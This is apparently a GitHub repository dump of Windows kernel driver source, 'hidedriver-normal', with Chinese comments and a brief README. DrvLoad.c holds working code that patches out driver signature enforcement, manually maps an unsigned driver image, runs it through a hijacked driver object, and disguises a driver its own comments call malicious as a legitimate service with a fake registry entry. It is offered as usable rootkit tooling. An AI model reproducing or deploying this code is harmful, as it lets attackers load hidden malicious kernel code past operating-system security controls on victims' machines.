├── DriverObject.c ├── DriverObject.h ├── DrvLoad.c ├── DrvLoad.h ├── Head.h ├── Kernel_PDB.cpp ├── Kernel_PDB.h ├── README.md ├── main.c ├── oxygenPdb.h ├── oxygenpdb.lib ├── tools.c └── tools.h /DriverObject.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/2367765883/hidedriver-normal/aa6002645de014bfc506870c6b3308b64cc4acfe/DriverObject.c -------------------------------------------------------------------------------- /DriverObject.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/2367765883/hidedriver-normal/aa6002645de014bfc506870c6b3308b64cc4acfe/DriverObject.h -------------------------------------------------------------------------------- /DrvLoad.c: -------------------------------------------------------------------------------- 1 | #include"Head.h" 2 | #include 3 | 4 | KEVENT WaitWorkItem; 5 | PDRIVER_OBJECT ShellDrv = NULL; 6 | BOOLEAN IsWDF = FALSE; 7 | 8 | 9 | 10 | //关于无签名驱动加载 11 | ULONG64 CIFun = NULL; 12 | PULONG64 Pqword_14040EF40 = NULL; 13 | //获取Nt头 14 | PIMAGE_NT_HEADERS(*RtlImageNtHeader)(PVOID DllBase) = NULL; 15 | 16 | //获取资源第一步 17 | NTSTATUS(*MiGenerateSystemImageNames)(PUNICODE_STRING DriverPath, ULONG64 zero1, ULONG64 zero2, PUNICODE_STRING OutUnicode, PUNICODE_STRING OutUnicode14, PUNICODE_STRING String1) = NULL; 18 | 19 | //获取资源第二步 获取DriverSection _LDR_DATA_TABLE_ENTRY 20 | NTSTATUS(*MiObtainSectionForDriver)(PUNICODE_STRING String1, PUNICODE_STRING DriverPath, ULONG64 zero1, ULONG64 zero2, PULONG64 PDriverSection) = NULL; 21 | 22 | //创建镜像虚拟地址 23 | PUCHAR(*MiGetSystemAddressForImage)(PVOID PSECTION, int zero, int* un) = NULL; 24 | 25 | //映射镜像物理地址 26 | NTSTATUS(*MiMapSystemImage)(PVOID PSECTION, PUCHAR BaseVa) = NULL; 27 | 28 | //get 数据目录地址 29 | PUCHAR(*RtlImageDirectoryEntryToData)(PUCHAR DllBase, ULONG64 one, ULONG64 one1, PULONG32 PSize) = NULL; 30 | 31 | //填充IAT辅助函数 32 | NTSTATUS(*MiSnapThunk)(PUCHAR importDllBase, PUCHAR DllBase, PULONG64 PITE, PULONG64 PIATE, ULONG64 zero) = NULL; 33 | 34 | //线程上锁 35 | PKTHREAD(*MmAcquireLoadLock)() = NULL; 36 | 37 | //线程解锁 38 | VOID(*MmReleaseLoadLock)(PKTHREAD thread) = NULL; 39 | 40 | //获取PPTE 41 | ULONG64(*MiFillPteHierarchy)(ULONG64 va, PPTE_HIERARCHY Pout) = NULL; 42 | 43 | //需要调用这个函数,R3才能成功 CreateFile 44 | VOID(*IopReadyDeviceObjects)(PDRIVER_OBJECT DrvObj) = NULL; 45 | 46 | //驱动入口 47 | NTSTATUS(*ShellDriverEntry)(PVOID a, PVOID b) = NULL; 48 | 49 | //Other 50 | 51 | 52 | ULONG64 SectionOffset = NULL; 53 | PLIST_ENTRY64 PsLoadedModuleList = NULL; 54 | ULONG64 BaseDllNameOffset = NULL; 55 | ULONG64 DllBaseOffset = NULL; 56 | ULONG64 SizeOfImageOffset = NULL; 57 | ULONG64 FlagsOffset = NULL; 58 | 59 | 60 | //---------------------- 61 | 62 | PULONG64 PIoDriverObjectType = NULL; 63 | 64 | //资源锁参数 65 | ULONG64 PIopDriverLoadResource = NULL; 66 | 67 | //默认MajorFunction 68 | ULONG64 PIopInvalidDeviceRequest = NULL; 69 | 70 | //创建对象 71 | NTSTATUS(*ObCreateObjectEx)(BOOLEAN AccMode, ULONG64 Type, POBJECT_ATTRIBUTES attributes, ULONG64 zero, PULONG64 Out, ULONG64 Size, ULONG64 zero1, ULONG64 zero2, PVOID PObject, ULONG64 zero3) = NULL; 72 | 73 | //加入对象表 74 | NTSTATUS(*ObInsertObjectEx)(PVOID PObject, ULONG64 zero, ULONG64 one, ULONG64 zero1, ULONG64 zero2, ULONG64 zero3, PHANDLE PHandle) = NULL; 75 | 76 | //重新构造DriverSection并插入链表 77 | NTSTATUS(*MiConstructLoaderEntry)(PLDR_DATA_TABLE_ENTRY DriverSection, 78 | PUNICODE_STRING DrvName,//"XXX.sys" 79 | PUNICODE_STRING DrvPath,// 80 | ULONG64 zero, 81 | ULONG64 one, 82 | PVOID PnewDriverSection) = NULL; 83 | 84 | ULONG64 PCmRegistryMachineHardwareDescriptionSystemName = NULL; 85 | 86 | 87 | EXTERN_C_START 88 | 89 | //调用ShellDriverEntry跳板 90 | NTSTATUS Shim(PShellContext PSContext) { 91 | NTSTATUS s = STATUS_SUCCESS; 92 | ShellDriverEntry(PSContext->DrvObj, PSContext->PSTR); 93 | KeSetEvent(&WaitWorkItem, 0, FALSE); 94 | return s; 95 | 96 | } 97 | 98 | //通过驱动名字获取基址 99 | PUCHAR GetDllBase(PUCHAR PDllName) { 100 | ANSI_STRING DllNameA; 101 | UNICODE_STRING DllNameU = { 0 }; 102 | RtlInitAnsiString(&DllNameA, PDllName); 103 | RtlAnsiStringToUnicodeString(&DllNameU, &DllNameA, TRUE); 104 | PLIST_ENTRY64 PDriverSection = PsLoadedModuleList->Blink; 105 | 106 | PUCHAR PDriverSectionByte = NULL; 107 | PUCHAR ReturnBase = NULL; 108 | PUNICODE_STRING BaseDllName = NULL; 109 | while (PDriverSection != PsLoadedModuleList) { 110 | PDriverSectionByte = (PUCHAR)PDriverSection; 111 | BaseDllName = (PUNICODE_STRING)(PDriverSectionByte + BaseDllNameOffset); 112 | if (RtlEqualUnicodeString(BaseDllName, &DllNameU, TRUE)) { 113 | ReturnBase = *((PULONG64)(PDriverSectionByte + DllBaseOffset)); 114 | break; 115 | } 116 | else { 117 | PDriverSection = PDriverSection->Blink; 118 | } 119 | } 120 | RtlFreeUnicodeString(&DllNameU); 121 | return ReturnBase; 122 | } 123 | 124 | //设置页面可写 125 | VOID SetWrite(ULONG64 va) { 126 | PPT_ENTRY_4KB ppte = NULL; 127 | PTE_HIERARCHY context = { 0 }; 128 | ULONG64 a = *(PULONG64)va; 129 | MiFillPteHierarchy(va, &context); 130 | ppte = context.pte; 131 | ppte->Fields.Write = 1; 132 | 133 | } 134 | 135 | ULONG64 WdfR0() { 136 | return 0; 137 | } 138 | 139 | 140 | PVOID 141 | ImageDirectoryEntryToData( 142 | PVOID BaseAddress, 143 | BOOLEAN MappedAsImage, 144 | USHORT DirectoryEntry, 145 | PULONG Size 146 | ) 147 | { 148 | PIMAGE_DOS_HEADER dosHeader; 149 | PIMAGE_NT_HEADERS ntHeaders; 150 | PIMAGE_DATA_DIRECTORY dataDirectory; 151 | PVOID directoryEntryData; 152 | ULONG entrySize; 153 | 154 | // 检查基地址是否有效 155 | if (BaseAddress == NULL) { 156 | if (Size) *Size = 0; 157 | return NULL; 158 | } 159 | 160 | // 获取 DOS 头 161 | dosHeader = (PIMAGE_DOS_HEADER)BaseAddress; 162 | // 检查 DOS 头的签名是否为 IMAGE_DOS_SIGNATURE 163 | if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE) { 164 | if (Size) *Size = 0; 165 | return NULL; 166 | } 167 | 168 | // 获取 NT 头 169 | ntHeaders = (PIMAGE_NT_HEADERS)((PUCHAR)BaseAddress + dosHeader->e_lfanew); 170 | // 检查 NT 头的签名是否为 IMAGE_NT_SIGNATURE 171 | if (ntHeaders->Signature != IMAGE_NT_SIGNATURE) { 172 | if (Size) *Size = 0; 173 | return NULL; 174 | } 175 | 176 | // 检查目录条目索引是否在有效范围内 177 | if (DirectoryEntry >= ntHeaders->OptionalHeader.NumberOfRvaAndSizes) { 178 | if (Size) *Size = 0; 179 | return NULL; 180 | } 181 | 182 | // 获取指定目录条目的数据目录 183 | dataDirectory = &ntHeaders->OptionalHeader.DataDirectory[DirectoryEntry]; 184 | entrySize = dataDirectory->Size; 185 | 186 | // 如果请求了目录条目的大小,则返回 187 | if (Size) *Size = entrySize; 188 | 189 | // 如果数据目录的虚拟地址为 0,返回 NULL 190 | if (dataDirectory->VirtualAddress == 0) { 191 | return NULL; 192 | } 193 | 194 | // 计算目录条目数据的地址 195 | directoryEntryData = (PVOID)((PUCHAR)BaseAddress + dataDirectory->VirtualAddress); 196 | 197 | // 如果映射为图像,直接返回计算出的数据地址 198 | if (MappedAsImage) { 199 | return directoryEntryData; 200 | } 201 | else { 202 | // 如果文件没有映射为图像,可能需要根据文件映射方式进行调整 203 | // 这里的调整取决于文件的映射方式,可能需要根据具体情况进行处理 204 | return directoryEntryData; 205 | } 206 | } 207 | 208 | 209 | 210 | //填充IAT 211 | BOOLEAN MakeIAT(PUCHAR DllBase) { 212 | PMyIID Piid = NULL; 213 | PUCHAR ImportDllBase = NULL; 214 | ULONG32 ImportSize = 0; 215 | PUCHAR PDllName = NULL; 216 | //DbgBreakPoint(); 217 | PUCHAR ImportVirtualAddress = ImageDirectoryEntryToData(DllBase, 1, 1, &ImportSize); 218 | int iidSize = sizeof(MyIID); 219 | 220 | PULONG64 PThisIATEOffset = 0; 221 | PULONG64 PThisITEOffset = 0; 222 | NTSTATUS status = STATUS_SUCCESS; 223 | Piid = (PMyIID)ImportVirtualAddress; 224 | for (int i = 0; i < ImportSize; i += iidSize) { 225 | if (Piid->d == 0) 226 | break;//全部填充完成 227 | PDllName = (PUCHAR)(DllBase + Piid->d); 228 | if (0 == memcmp(PDllName, WDF, 10)) {//WDF 需要修复 229 | IsWDF = TRUE; 230 | PThisIATEOffset = DllBase + Piid->e; 231 | while (*PThisIATEOffset != 0) { 232 | //SetWrite(PThisIATEOffset); 233 | PVOID64 pMemory = NULL; 234 | PVOID64 pMdl = IoAllocateMdl(PThisIATEOffset, 8, FALSE, FALSE, NULL); 235 | MmBuildMdlForNonPagedPool(pMdl); 236 | pMemory = MmMapLockedPages(pMdl, KernelMode); 237 | *(PULONG64)pMemory = WdfR0; 238 | MmUnmapLockedPages(pMemory, pMdl); 239 | IoFreeMdl(pMdl); 240 | 241 | PThisIATEOffset++; 242 | } 243 | Piid++; 244 | continue; 245 | } 246 | ImportDllBase = GetDllBase(PDllName);//get ImportDllBase 247 | PThisIATEOffset = DllBase + Piid->e; 248 | PThisITEOffset = DllBase + Piid->a; 249 | while (*PThisIATEOffset != 0 && *PThisITEOffset != 0) { 250 | PVOID64 pMemory = NULL; 251 | PVOID64 pMdl = IoAllocateMdl(PThisIATEOffset, 8, FALSE, FALSE, NULL); 252 | MmBuildMdlForNonPagedPool(pMdl); 253 | pMemory = MmMapLockedPages(pMdl, KernelMode); 254 | status = MiSnapThunk(ImportDllBase, DllBase, PThisITEOffset, pMemory, 0); 255 | MmUnmapLockedPages(pMemory, pMdl); 256 | IoFreeMdl(pMdl); 257 | 258 | if (status != STATUS_SUCCESS) { 259 | DbgPrint("error!\n"); 260 | return FALSE; 261 | } 262 | PThisITEOffset++; 263 | PThisIATEOffset++; 264 | } 265 | Piid++; 266 | } 267 | return TRUE; 268 | } 269 | 270 | //禁用签名强制性回调 271 | ULONG64 MySeValidateImageHeader() { 272 | return 0; 273 | } 274 | 275 | struct _WDF_BIND_INFO { 276 | ULONG32 Szie; 277 | UCHAR RZ[4]; 278 | ULONG64 Component; 279 | UCHAR Version[0xc]; 280 | ULONG32 FuncCount; 281 | ULONG64 FuncTable; 282 | ULONG64 Module; 283 | }; 284 | //加载隐藏驱动 285 | VOID LoadDrv(PWCHAR DrvPath) { 286 | 287 | int un = 0; 288 | PUCHAR PDriverSection = NULL; 289 | PUCHAR Section = NULL; 290 | PUCHAR DllBase = NULL; 291 | UNICODE_STRING Path; 292 | UNICODE_STRING Out; 293 | UNICODE_STRING Out14[14]; 294 | UNICODE_STRING String1; 295 | PKTHREAD thread = NULL; 296 | KIRQL OldIrql = 0; 297 | 298 | //初始化事件 299 | KeInitializeEvent(&WaitWorkItem, SynchronizationEvent, FALSE); 300 | 301 | //禁用驱动签名强制 如果需要加载的驱动有签名,就不需要这一部分了,因为容易蓝屏 302 | CIFun = *Pqword_14040EF40; 303 | DbgPrint("PSeValidateImageHeader here %p\n", Pqword_14040EF40); 304 | *Pqword_14040EF40 = MySeValidateImageHeader; 305 | //映射驱动 306 | RtlInitUnicodeString(&Path, DrvPath); 307 | NTSTATUS s0 = MiGenerateSystemImageNames(&Path, 0, 0, &Out, Out14, &String1); 308 | thread = MmAcquireLoadLock(); 309 | NTSTATUS s1 = MiObtainSectionForDriver(&String1, &Path, 0, 0, &PDriverSection); 310 | MmReleaseLoadLock(thread); 311 | if (s1 != STATUS_SUCCESS) { 312 | DbgPrint("error code:%X\n", s1); 313 | return; 314 | } 315 | Section = *(PULONG64)(PDriverSection + SectionOffset); 316 | DllBase = MiGetSystemAddressForImage(Section, 0, &un); 317 | KeRaiseIrql(1, &OldIrql); 318 | NTSTATUS s2 = MiMapSystemImage(Section, DllBase); 319 | KeLowerIrql(OldIrql); 320 | //恢复驱动签名强制 如果需要加载的驱动有签名,就不需要这一部分了,因为容易蓝屏 321 | *Pqword_14040EF40 = CIFun; 322 | 323 | //获取DriverEntry 324 | PIMAGE_NT_HEADERS Head = RtlImageNtHeader(DllBase); 325 | PUCHAR Headd = (PUCHAR)Head; 326 | int* p = NULL; 327 | p = Headd + 0x10;//IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint 328 | PULONG64 c = &ShellDriverEntry; 329 | *c = DllBase + *p; 330 | 331 | 332 | //修复IAT 333 | if (!MakeIAT(DllBase)) { 334 | return; 335 | } 336 | 337 | 338 | //修复_security_cookie 339 | int size = 0; 340 | PULONG64 ConfigAdd = 0; 341 | PULONG64 P_security_cookieAddress = NULL; 342 | ConfigAdd = RtlImageDirectoryEntryToData(DllBase, 1, 0xA, &size); 343 | 344 | if (!ConfigAdd) 345 | { 346 | DbgPrintEx(77, 0, "请编译源码的时候启用安全检查 (/GS)!\n"); 347 | 348 | return FALSE; 349 | } 350 | 351 | P_security_cookieAddress = ConfigAdd[0xb]; 352 | //SetWrite(P_security_cookieAddress); 353 | //PVOID64 pMemory = NULL; 354 | //PVOID64 pMdl = IoAllocateMdl(P_security_cookieAddress, 4, FALSE, FALSE, NULL); 355 | //MmBuildMdlForNonPagedPool(pMdl); 356 | //pMemory = MmMapLockedPages(pMdl, KernelMode); 357 | *P_security_cookieAddress = 1;//随意更改,但是一定要改 358 | //MmUnmapLockedPages(pMemory, pMdl); 359 | //IoFreeMdl(pMdl); 360 | 361 | //修复WDF(仅WDF需要修复,WDM无视) 362 | struct _WDF_BIND_INFO* PWdfBindInfo = ((ULONG64)P_security_cookieAddress) + 0x10; 363 | PULONG64 PWdfFunctions = PWdfBindInfo->FuncTable; 364 | PULONG64 PWdfDriverGlobals = NULL; 365 | if (IsWDF == TRUE) { 366 | *PWdfFunctions = (ULONG64)ExAllocatePool(NonPagedPool, 0x1000); 367 | if ((*PWdfFunctions) == NULL) { 368 | return; 369 | } 370 | memset(*PWdfFunctions, 0, 0x1000); 371 | PWdfDriverGlobals = ((ULONG64)PWdfFunctions) + 8; 372 | *PWdfDriverGlobals = ExAllocatePool(NonPagedPool, 0x100); 373 | if (*PWdfDriverGlobals == NULL) { 374 | ExFreePool(*PWdfFunctions); 375 | return; 376 | }memset(*PWdfDriverGlobals, 0, 0x100); 377 | } 378 | 379 | //driverEntry 380 | DbgPrint("DllBase:%p\n", DllBase); 381 | ShellContext SContext = { 0 }; 382 | SContext.DrvObj = FindNotDeviceDriver(); 383 | ULONG64 OldDriverUnLoad = SContext.DrvObj->DriverUnload;//备份一下DriverUnLoad 384 | WORK_QUEUE_ITEM WorkItem = { 0 }; 385 | WorkItem.WorkerRoutine = Shim; 386 | WorkItem.Parameter = &SContext; 387 | WorkItem.List.Flink = 0i64; 388 | ExQueueWorkItem(&WorkItem, DelayedWorkQueue); 389 | //等一下 390 | KeWaitForSingleObject(&WaitWorkItem, Executive, KernelMode, FALSE, NULL); 391 | 392 | //还原DriverUnLoad 393 | SContext.DrvObj->DriverUnload = OldDriverUnLoad; 394 | 395 | //提交劫持设备 396 | IopReadyDeviceObjects(SContext.DrvObj); 397 | 398 | //释放 399 | if (IsWDF == TRUE) { 400 | ExFreePool(*PWdfFunctions); 401 | ExFreePool(*PWdfDriverGlobals); 402 | *PWdfFunctions = 0; 403 | *PWdfDriverGlobals = 0; 404 | } 405 | 406 | } 407 | 408 | //-------------------------------------------驱动伪装 409 | //创建注册表项 返回对应注册表句柄 410 | HANDLE CreateRegistry(PWCHAR ODrvPath, PWCHAR ServiceName) { 411 | NTSTATUS status = STATUS_SUCCESS; 412 | OBJECT_ATTRIBUTES objAttrs = { 0 }; 413 | UNICODE_STRING SerRegistryPath = { 0 }, SerName = { 0 }, RegUnicodeString = { 0 }; 414 | HANDLE hReg = NULL; 415 | ULONG64 Out = 0; 416 | UNICODE_STRING ImagePathUn = { 0 }, DisplayNameUn = { 0 }, ErrorControlUn = { 0 }, StartUn = { 0 }, TypeUn = { 0 }; 417 | RtlInitUnicodeString(&DisplayNameUn, L"DisplayName"); 418 | RtlInitUnicodeString(&ImagePathUn, L"ImagePath"); 419 | RtlInitUnicodeString(&ErrorControlUn, L"ErrorControl"); 420 | RtlInitUnicodeString(&StartUn, L"Start"); 421 | RtlInitUnicodeString(&TypeUn, L"Type"); 422 | ULONG64 EC = 1, Str = 3, Typ = 1; 423 | RtlInitUnicodeString(&SerRegistryPath, ServiceRegistryPath); 424 | RtlInitUnicodeString(&SerName, ServiceName); 425 | RegUnicodeString.Buffer = ExAllocatePool(NonPagedPool, (ULONG64)SerRegistryPath.MaximumLength + (ULONG64)SerName.MaximumLength); 426 | if (RegUnicodeString.Buffer == NULL) { 427 | return 0; 428 | } 429 | //DbgBreakPoint(); 430 | memset(RegUnicodeString.Buffer, 0, (ULONG64)SerRegistryPath.MaximumLength + (ULONG64)SerName.MaximumLength); 431 | memcpy(RegUnicodeString.Buffer, SerRegistryPath.Buffer, SerRegistryPath.Length); 432 | memcpy(&RegUnicodeString.Buffer[SerRegistryPath.Length / 2], SerName.Buffer, SerName.Length); 433 | RegUnicodeString.MaximumLength = SerRegistryPath.MaximumLength + SerName.MaximumLength; 434 | RegUnicodeString.Length = SerRegistryPath.Length + SerName.Length; 435 | InitializeObjectAttributes(&objAttrs, &RegUnicodeString, OBJ_CASE_INSENSITIVE, NULL, NULL); 436 | status = ZwCreateKey(&hReg, KEY_ALL_ACCESS, &objAttrs, 0, NULL, REG_OPTION_VOLATILE, &Out); 437 | status = ZwSetValueKey(hReg, &ImagePathUn, NULL, REG_EXPAND_SZ, ODrvPath, 2 * wcslen(ODrvPath)); 438 | status = ZwSetValueKey(hReg, &DisplayNameUn, NULL, REG_SZ, ServiceName, 2 * wcslen(ServiceName)); 439 | status = ZwSetValueKey(hReg, &ErrorControlUn, NULL, REG_DWORD, &EC, 4); 440 | status = ZwSetValueKey(hReg, &StartUn, NULL, REG_DWORD, &Str, 4); 441 | status = ZwSetValueKey(hReg, &TypeUn, NULL, REG_DWORD, &Typ, 4); 442 | return hReg; 443 | } 444 | 445 | //ADrvPath 恶意驱动路径: 例如:L"\\??\\C:\\Users\\52pojie\\Desktop\\A.sys" 446 | //ODrvPath 傀儡驱动路径: 例如:L"\\??\\C:\\Users\\52pojie\\Desktop\\T.sys" 447 | //ServiceName 傀儡服务名: 例如:L"xixi" 448 | BOOLEAN CamouflageDrvLoad(PWCHAR ADrvPath, PWCHAR ODrvPath, PWCHAR ServiceName) { 449 | NTSTATUS status = STATUS_SUCCESS; 450 | PDRIVER_OBJECT PTDrvObj = NULL; 451 | ULONG64 Out = 0; 452 | WCHAR ServiceNameBuffer[0x50] = { 0 }; 453 | HANDLE HRegistry = NULL; 454 | 455 | //映射、修复IAT 456 | int un = 0; 457 | PUCHAR PADriverSection = NULL; 458 | PLDR_DATA_TABLE_ENTRY PODriverSection = NULL; 459 | PLDR_DATA_TABLE_ENTRY NewPODriverSection = NULL; 460 | //这三个都是ADrv的信息 461 | PUCHAR Section = NULL; 462 | PUCHAR DllBase = NULL; 463 | ULONG32 DllSize = 0; 464 | 465 | UNICODE_STRING ADrvPathUn; 466 | UNICODE_STRING ODrvPathUn; 467 | //这两个都是ODrv的信息 468 | UNICODE_STRING OutU; 469 | UNICODE_STRING Out14[14]; 470 | 471 | UNICODE_STRING AString; 472 | UNICODE_STRING OString; 473 | PKTHREAD thread = NULL; 474 | 475 | PUCHAR Head = NULL; 476 | 477 | PULONG64 ConfigAdd = 0; 478 | PULONG64 P_security_cookieAddress = NULL; 479 | 480 | struct _WDF_BIND_INFO* PWdfBindInfo = NULL; 481 | PULONG64 PWdfFunctions = NULL; 482 | PULONG64 PWdfDriverGlobals = NULL; 483 | 484 | HANDLE DrvH = NULL; 485 | OBJECT_ATTRIBUTES att = { 0 }; 486 | UNICODE_STRING ObjectName = { 0 }; 487 | 488 | PUNICODE_STRING PSTR = NULL; 489 | ULONG NtQueryObjReturnLen = 0; 490 | ShellContext DEContext = { 0 }; 491 | WORK_QUEUE_ITEM WorkItem = { 0 }; 492 | 493 | KIRQL OldIrql = 0; 494 | //创建服务注册表 495 | HRegistry = CreateRegistry(ODrvPath, ServiceName); 496 | //DbgBreakPoint(); 497 | try { 498 | //上锁 499 | ExAcquireResourceExclusiveLite(PIopDriverLoadResource, 1); 500 | //禁用驱动签名强制 如果需要加载的驱动有签名,就不需要这一部分了,因为容易蓝屏 501 | /* CIFun = *Pqword_14040EF40; 502 | DbgPrintEx(77, 0, "PSeValidateImageHeader here %p\n", Pqword_14040EF40); 503 | *Pqword_14040EF40 = MySeValidateImageHeader;*/ 504 | 505 | //映射驱动 506 | RtlInitUnicodeString(&ADrvPathUn, ADrvPath); 507 | status = MiGenerateSystemImageNames(&ADrvPathUn, 0, 0, &OutU, Out14, &AString); 508 | //OUT : UN"已签名.sys" 509 | //Out14[0] : UN"Path前缀" Out14[3] : UN"\Driver\" 510 | //String1 同 Path 511 | RtlInitUnicodeString(&ODrvPathUn, ODrvPath); 512 | status = MiGenerateSystemImageNames(&ODrvPathUn, 0, 0, &OutU, Out14, &OString); 513 | 514 | //DbgBreakPoint(); 515 | //创建DriverSection 516 | thread = MmAcquireLoadLock(); 517 | status = MiObtainSectionForDriver(&AString, &ADrvPathUn, 0, 0, &PADriverSection); 518 | status = MiObtainSectionForDriver(&OString, &ODrvPathUn, 0, 0, &PODriverSection); 519 | MmReleaseLoadLock(thread); 520 | 521 | 522 | 523 | //映射ADrv,不映射ODrv 524 | Section = *(PULONG64)(PADriverSection + SectionOffset);//改了这 525 | DllBase = MiGetSystemAddressForImage(Section, 0, &un); 526 | 527 | KeRaiseIrql(1, &OldIrql); 528 | NTSTATUS s2 = MiMapSystemImage(Section, DllBase); 529 | KeLowerIrql(OldIrql); 530 | 531 | //恢复驱动签名强制 如果需要加载的驱动有签名,就不需要这一部分了,因为容易蓝屏 532 | //*Pqword_14040EF40 = CIFun; 533 | Head = RtlImageNtHeader(DllBase); 534 | DllSize = *(PULONG32)(Head + 0x50); 535 | 536 | //提交DriverSection 537 | PODriverSection->SizeOfImage = DllSize; 538 | PODriverSection->DllBase = DllBase; 539 | status = MiConstructLoaderEntry(PODriverSection, &OutU, &OString, 0, 1, &NewPODriverSection); 540 | ExFreePoolWithTag(PODriverSection, 0); 541 | ExFreePoolWithTag(PADriverSection, 0); 542 | NewPODriverSection->Flags = 0x49104000; 543 | //flag 0x49104000 544 | 545 | 546 | //修复IAT 547 | MakeIAT(DllBase); 548 | 549 | 550 | //修复_security_cookie 551 | int size = 0; 552 | ConfigAdd = ImageDirectoryEntryToData(DllBase, 1, 0xA, &size); 553 | 554 | if (!ConfigAdd) 555 | { 556 | DbgPrintEx(77, 0, "请编译源码的时候启用安全检查 (/GS)!\n"); 557 | 558 | return FALSE; 559 | } 560 | 561 | 562 | P_security_cookieAddress = ConfigAdd[0xb]; 563 | //SetWrite(P_security_cookieAddress, 1); 564 | //PVOID64 pMemory = NULL; 565 | //PVOID64 pMdl = IoAllocateMdl(P_security_cookieAddress, 8, FALSE, FALSE, NULL); 566 | //MmBuildMdlForNonPagedPool(pMdl); 567 | //pMemory = MmMapLockedPages(pMdl, KernelMode); 568 | *P_security_cookieAddress = 1; 569 | //MmUnmapLockedPages(pMemory, pMdl); 570 | //IoFreeMdl(pMdl); 571 | //SetWrite(P_security_cookieAddress, 0); 572 | 573 | //修复WDF 574 | if (IsWDF == TRUE) { 575 | PWdfBindInfo = ((ULONG64)P_security_cookieAddress) + 0x10; 576 | PWdfFunctions = PWdfBindInfo->FuncTable; 577 | //SetWrite(P_security_cookieAddress, 1); 578 | *PWdfFunctions = (ULONG64)ExAllocatePool(NonPagedPool, 0x1000); 579 | //SetWrite(P_security_cookieAddress, 0); 580 | if ((*PWdfFunctions) == NULL) { 581 | return FALSE; 582 | } 583 | memset(*PWdfFunctions, 0, 0x1000); 584 | PWdfDriverGlobals = ((ULONG64)PWdfFunctions) + 8; 585 | //SetWrite(P_security_cookieAddress, 1); 586 | *PWdfDriverGlobals = ExAllocatePool(NonPagedPool, 0x100); 587 | //SetWrite(P_security_cookieAddress, 0); 588 | if (*PWdfDriverGlobals == NULL) { 589 | ExFreePool(*PWdfFunctions); 590 | return FALSE; 591 | }memset(*PWdfDriverGlobals, 0, 0x100); 592 | } 593 | 594 | 595 | DbgPrintEx(77, 0, "DllBase:%p\n", DllBase); 596 | 597 | 598 | //构造DriverObject并插入 599 | memcpy(ServiceNameBuffer, DrvObjNamePrefix, 2 * wcslen(DrvObjNamePrefix)); 600 | memcpy(&ServiceNameBuffer[wcslen(DrvObjNamePrefix)], ServiceName, 2 * wcslen(ServiceName)); 601 | RtlInitUnicodeString(&ObjectName, ServiceNameBuffer); 602 | att.Length = 0x30; att.Attributes = 0x250; att.ObjectName = &ObjectName; 603 | status = ObCreateObjectEx(0, *PIoDriverObjectType, &att, 0, &Out, 0x1A0, 0, 0, &PTDrvObj, 0); 604 | if (status != STATUS_SUCCESS) { 605 | return status; 606 | } 607 | memset(PTDrvObj, 0, 0x1a0); 608 | PTDrvObj->DriverExtension = &PTDrvObj[1]; 609 | *(PULONG64)(&PTDrvObj[1]) = &PTDrvObj[0]; 610 | for (int i = 0; i <= IRP_MJ_MAXIMUM_FUNCTION; i++) { 611 | PTDrvObj->MajorFunction[i] = PIopInvalidDeviceRequest; 612 | } 613 | PTDrvObj->Type = 4; PTDrvObj->Size = 0x150; 614 | PTDrvObj->DriverInit = NewPODriverSection->EntryPoint; 615 | PTDrvObj->DriverSection = NewPODriverSection; 616 | PTDrvObj->DriverStart = DllBase; 617 | PTDrvObj->DriverSize = DllSize; 618 | PTDrvObj->Flags |= 2; 619 | //DbgBreakPoint(); 620 | status = ObInsertObjectEx(PTDrvObj, 0, 1, 0, 0, 0, &DrvH); 621 | ExReleaseResourceLite(PIopDriverLoadResource);//解锁 622 | status = ObReferenceObjectByHandle(DrvH, 0, *PIoDriverObjectType, 0, &PTDrvObj, NULL); 623 | ZwClose(DrvH); 624 | PTDrvObj->HardwareDatabase = PCmRegistryMachineHardwareDescriptionSystemName; 625 | PTDrvObj->DriverName.Buffer = ExAllocatePool(NonPagedPool, ObjectName.MaximumLength); 626 | PTDrvObj->DriverName.Length = ObjectName.Length; 627 | PTDrvObj->DriverName.MaximumLength = ObjectName.MaximumLength; 628 | if (PTDrvObj->DriverName.Buffer == NULL) { 629 | return FALSE; 630 | } 631 | memcpy(PTDrvObj->DriverName.Buffer, ObjectName.Buffer, ObjectName.MaximumLength); 632 | 633 | //DriverEntry 634 | PSTR = ExAllocatePool(NonPagedPool, 0x1000); 635 | status = ZwQueryObject(HRegistry, 1, PSTR, 0x1000, &NtQueryObjReturnLen); 636 | DEContext.DrvObj = PTDrvObj; 637 | DEContext.PSTR = PSTR; 638 | KeInitializeEvent(&WaitWorkItem, SynchronizationEvent, FALSE); 639 | PULONG64 SetDriverEntry = &ShellDriverEntry; 640 | *SetDriverEntry = PTDrvObj->DriverInit; 641 | WorkItem.WorkerRoutine = Shim; 642 | WorkItem.Parameter = &DEContext; 643 | WorkItem.List.Flink = 0i64; 644 | ExQueueWorkItem(&WorkItem, DelayedWorkQueue); 645 | 646 | KeWaitForSingleObject(&WaitWorkItem, Executive, KernelMode, FALSE, NULL); 647 | //提交设备 648 | IopReadyDeviceObjects(PTDrvObj); 649 | //释放 650 | ExFreePool(PSTR); 651 | ZwClose(HRegistry); 652 | if (IsWDF == TRUE) { 653 | ExFreePool(*PWdfFunctions); 654 | ExFreePool(*PWdfDriverGlobals); 655 | *PWdfFunctions = 0; 656 | *PWdfDriverGlobals = 0; 657 | } 658 | return TRUE; 659 | }except(1) { 660 | return FALSE; 661 | } 662 | } 663 | EXTERN_C_END -------------------------------------------------------------------------------- /DrvLoad.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/2367765883/hidedriver-normal/aa6002645de014bfc506870c6b3308b64cc4acfe/DrvLoad.h -------------------------------------------------------------------------------- /Head.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "Kernel_PDB.h" 3 | #include"DriverObject.h" 4 | #include"DrvLoad.h" -------------------------------------------------------------------------------- /Kernel_PDB.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/2367765883/hidedriver-normal/aa6002645de014bfc506870c6b3308b64cc4acfe/Kernel_PDB.cpp -------------------------------------------------------------------------------- /Kernel_PDB.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/2367765883/hidedriver-normal/aa6002645de014bfc506870c6b3308b64cc4acfe/Kernel_PDB.h -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # hidedriver-normal 2 | 3 | 1.修复了原作者中ImageDirectoryEntryToData函数会异常,重写同样功能函数; 4 | 5 | 2......记不得了; 6 | 7 | 8 | 9 | 